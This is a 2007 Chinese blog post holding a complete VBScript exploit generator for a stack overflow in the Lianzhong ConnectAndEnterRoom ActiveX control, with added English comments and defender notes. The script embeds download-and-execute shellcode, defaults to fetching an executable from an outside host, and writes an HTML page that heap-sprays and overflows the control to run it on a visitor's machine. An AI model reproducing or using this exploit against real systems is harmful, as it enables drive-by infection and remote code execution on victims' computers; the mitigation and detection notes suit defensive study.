联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

    [多云 November 25, 2007 17:20 | by ]
来源:vbs空间
联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞


' Asks the operator for the URL of an executable; the default value points at the
' author's own host. Defender note: this URL and the generated file name used below
' (netpatch.htm) are the page-specific indicators for this tooling.
exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
' Payload as "\xNN" text: a fixed x86 stub, then the URL rendered by Unicode() and two
' terminating NUL bytes. The readable ASCII at the end of the stub spells the Win32 API
' names it resolves (GetProcAddress, GetSystemDirectoryA, WinExec, ExitThread,
' LoadLibraryA, urlmon, URLDownloadToFileA), i.e. a download-and-execute payload.
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8b\x7e\x20\x03\xfb\x8b\x4e\x14\x33\xed\x56\x57\x51\x8b\x3f\x03\xfb\x8b\xf2\x6a\x0e\x59\xf3\xa6\x74\x08\x59\x5f\x83\xc7\x04\x45\xe2\xe9\x59\x5f\x5e\x8b\xcd\x8b\x46\x24\x03\xc3\xd1\xe1\x03\xc1\x33\xc9\x66\x8b\x08\x8b\x46\x1c\x03\xc3\xc1\xe1\x02\x03\xc1\x8b\x00\x03\xc3\x8b\xfa\x8b\xf7\x83\xc6\x0e\x8b\xd0\x6a\x04\x59\xe8\x6a\x00\x00\x00\x83\xc6\x0d\x52\x56\xff\x57\xfc\x5a\x8b\xd8\x6a\x01\x59\xe8\x57\x00\x00\x00\x83\xc6\x13\x56\x46\x80\x3e\x80\x75\xfa\x80\x36\x80\x5e\x83\xec\x40\x8b\xdc\xc7\x03\x63\x6d\x64\x20\x43\x43\x43\x43\x66\xc7\x03\x2f\x63\x43\x43\xc6\x03\x20\x43\x6a\x20\x53\xff\x57\xec\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33\xc0\x50\x50\x53\x56\x50\xff\x57\xfc\x8b\xdc\x6a\x00\x53\xff\x57\xf0\x68\x51\x24\x40\x00\x58\xff\xd0\x33\xc0\xac\x85\xc0\x75\xf9\x51\x52\x56\x53\xff\xd2\x5a\x59\xab\xe2\xee\x33\xc0\xc3\xe8\x0c\xff\xff\xff\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x47\x65\x74\x53\x79\x73\x74\x65\x6d\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x00\x75\x72\x6c\x6d\x6f\x6e\x00\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65\x41\x00"&Unicode(exeurl&Chr(00)&Chr(00))
' Renders each character of str1 as a "\xNN" text token built from the low byte of
' its code point: Hex(AscW(ch)) is cut to its last two hex digits by right(...,2).
' Despite the name this is not a UTF-16 encoding; any character above U+00FF loses
' its high byte. The len(temp) < 5 test is always true for a 16-bit value (Hex gives
' at most four digits), so the truncation is effectively unconditional.
' The loop variable i is undeclared (no Option Explicit in this script).
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
If len(temp) < 5 Then temp = right("0000"&temp, 2)
str = str & "\x" & temp
Next
Unicode = str
End Function
' Rewrites each consecutive "\xAA\xBB" byte pair in str into the JavaScript escape
' "%uBBAA" (byte order swapped, so the 16-bit unit is little-endian for unescape()).
' An odd trailing byte has no partner and is left as "\xNN". Matching is global and
' case-insensitive; regex and matches are undeclared script-level variables.
function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
' Appends the generated page to netpatch.htm (opentextfile mode 8 = ForAppending,
' create if missing). The page instantiates the control by CLSID, sprays the heap from
' JavaScript (300 blocks, each grown to about 0x40000 bytes of %u9090 NOP sled followed
' by the payload), then builds a 164-byte "A" buffer with "\x0a\x0a\x0a\x0a" spliced in
' and passes it as the first argument of ConnectAndEnterRoom so the overwritten return
' address lands inside the sprayed region.
' Mitigation: setting the Internet Explorer kill bit for
' CLSID AE93C5DF-A990-11D1-AEBD-5254ABDD2B69 stops the control from being scripted
' from a web page. Detection: the unescape("%u9090%u9090") spray loop and the
' repeated 0x0a0a0a0a filler are the generic heap-spray pattern of this era, and the
' fixed CLSID plus the netpatch.htm name are the page-specific indicators.
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("netpatch.htm",8,true)
fileS.writeline "<html>"
fileS.writeline "<object classid=""clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69"" id='target'></object>"
fileS.writeline "<body>"
fileS.writeline "<SCRIPT language=""JavaScript"">"
fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");"
fileS.writeline "var bigblock = unescape(""%u9090%u9090"");"
fileS.writeline "var headersize = 20;"
fileS.writeline "var slackspace = headersize+shellcode.length;"
fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"
fileS.writeline "fillblock = bigblock.substring(0, slackspace);"
fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"
fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"
fileS.writeline "var buffer = '';"
fileS.writeline "while (buffer.length < 164) buffer+=""A"";"
fileS.writeline "buffer=buffer+""\x0a\x0a\x0a\x0a""+buffer;"
fileS.writeline "ok=""ok"";"
fileS.writeline "target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok );"
fileS.writeline "</script>"
fileS.writeline "</body>"
fileS.writeline "</html>"files.Close
Set fso=nothing
msgbox "生成完毕!"
end if